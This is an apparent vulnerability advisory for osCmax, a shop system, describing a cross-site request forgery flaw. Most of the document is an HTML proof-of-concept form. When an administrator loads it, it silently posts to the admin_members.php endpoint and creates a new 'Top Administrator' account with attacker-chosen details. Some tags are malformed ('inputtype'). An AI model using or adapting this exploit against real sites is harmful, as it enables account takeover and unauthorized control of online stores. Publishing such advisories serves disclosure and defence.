source: https://www.securityfocus.com/bid/66272/info
osCmax is prone to a cross-site request-forgery vulnerability because it does not properly validate HTTP requests.
Exploiting this issue may allow a remote attacker to perform certain unauthorized actions. This may lead to further attacks.<html><form method="post" name="newmember" action="http://127.0.0.1/catalog/admin/admin_members.php?action=member_new&page=1&mID=1"><inputtype="hidden" name="admin_username" value="THETUNISIAN"/><inputtype="hidden" name="admin_firstname" value="Moot3x"/><inputtype="hidden" name="admin_lastname" value="Saad3x"/><inputtype="hidden" name="admin_email_address" value="g4k@hotmail.esxxx"/><inputtype="hidden" name="admin_groups_id" value="1"/><!-- About "admin_groups_id"--><!--1= Top Administrator --><!--2= Customer Service--><inputtype='submit' name='Submit4' value="Agregar"></form></html>
